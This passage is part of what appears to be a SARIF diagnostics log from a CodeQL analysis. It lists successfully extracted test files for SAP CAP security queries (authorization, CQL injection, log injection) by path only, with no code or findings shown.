orks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/package.json","uriBaseId":"%SRCROOT%","index":126}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service1.cds","uriBaseId":"%SRCROOT%","index":127}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service1.js","uriBaseId":"%SRCROOT%","index":128}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service2.cds","uriBaseId":"%SRCROOT%","index":129}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service2.js","uriBaseId":"%SRCROOT%","index":130}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds","uriBaseId":"%SRCROOT%","index":131}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json","uriBaseId":"%SRCROOT%","index":132}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js","uriBaseId":"%SRCROOT%","index":133}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds","uriBaseId":"%SRCROOT%","index":134}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/model.cds.json","uriBaseId":"%SRCROOT%","index":135}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js","uriBaseId":"%SRCROOT%","index":136}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js","uriBaseId":"%SRCROOT%","index":137}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds","uriBaseId":"%SRCROOT%","index":138}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds","uriBaseId":"%SRCROOT%","index":139}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/model.cds.json","uriBaseId":"%SRCROOT%","index":140}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json","uriBaseId":"%SRCROOT%","index":141}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js","uriBaseId":"%SRCROOT%","index":142}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds","uriBaseId":"%SRCROOT%","index":143}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js","uriBaseId":"%SRCROOT%","index":144}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds","uriBaseId":"%SRCROOT%","index":145}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js","uriBaseId":"%SRCROOT%","index":146}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/db/schema.cds","uriBaseId":"%SRCROOT%","index":147}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/model.cds.json","uriBaseId":"%SRCROOT%","index":148}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/package-lock.json","uriBaseId":"%SRCROOT%","index":149}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/package.json","uriBaseId":"%SRCROOT%","index":150}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/server.js","uriBaseId":"%SRCROOT%","index":151}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/privileged-user.js","uriBaseId":"%SRCROOT%","index":152}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds","uriBaseId":"%SRCROOT%","index":153}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.js","uriBaseId":"%SRCROOT%","index":154}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.cds","uriBaseId":"%SRCROOT%","index":155}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.js","uriBaseId":"%SRCROOT%","index":156}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds","uriBaseId":"%SRCROOT%","index":157}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/model.cds.json","uriBaseId":"%SRCROOT%","index":158}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json","uriBaseId":"%SRCROOT%","index":159}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js","uriBaseId":"%SRCROOT%","index":160}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds","uriBaseId":"%SRCROOT%","index":161}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js","uriBaseId":"%SRCROOT%","index":162}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds","uriBaseId":"%SRCROOT%","index":163}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js","uriBaseId":"%SRCROOT%","index":164}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/model.cds.json","uriBaseId":"%SRCROOT%","index":165}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds","uriBaseId":"%SRCROOT%","index":166}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json","uriBaseId":"%SRCROOT%","index":167}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds","uriBaseId":"%SRCROOT%","index":168}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js","uriBaseId":"%SRCROOT%","index":169}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js","uriBaseId":"%SRCROOT%","index":170}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds","uriBaseId":"%SRCROOT%","index":171}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js","uriBaseId":"%SRCROOT%","index":172}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds","uriBaseId":"%SRCROOT%","index":173}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json","uriBaseId":"%SRCROOT%","index":174}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/model.cds.json","uriBaseId":"%SRCROOT%","index":175}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js","uriBaseId":"%SRCROOT%","index":176}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds","uriBaseId":"%SRCROOT%","index":177}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds","uriBaseId":"%SRCROOT%","index":178}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js","uriBaseId":"%SRCROOT%","index":179}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js","uriBaseId":"%SRCROOT%","index":180}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/package.json","uriBaseId":"%SRCROOT%","index":181}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/model.cds.json","uriBaseId":"%SRCROOT%","index":182}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/server.js","uriBaseId":"%SRCROOT%","index":183}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.cds","uriBaseId":"%SRCROOT%","index":184}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service2.cds","uriBaseId":"%SRCROOT%","index":185}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service2.js","uriBaseId":"%SRCROOT%","index":186}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds","uriBaseId":"%SRCROOT%","index":187}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/model.cds.json","uriBaseId":"%SRCROOT%","index":188}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/db/schema.cds","uriBaseId":"%SRCROOT%","index":189}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json","uriBaseId":"%SRCROOT%","index":190}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js","uriBaseId":"%SRCROOT%","index":191}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds","uriBaseId":"%SRCROOT%","index":192}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js","uriBaseId":"%SRCROOT%","index":193}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds","uriBaseId":"%SRCROOT%","index":194}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/db/schema.cds","uriBaseId":"%SRCROOT%","index":195}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/model.cds.json","uriBaseId":"%SRCROOT%","index":196}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js","uriBaseId":"%SRCROOT%","index":197}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/package.json","uriBaseId":"%SRCROOT%","index":198}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.cds","uriBaseId":"%SRCROOT%","index":199}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/server.js","uriBaseId":"%SRCROOT%","index":200}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.js","uriBaseId":"%SRCROOT%","index":201}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":202}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json","uriBaseId":"%SRCROOT%","index":203}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":204}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/model.cds.json","uriBaseId":"%SRCROOT%","index":205}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/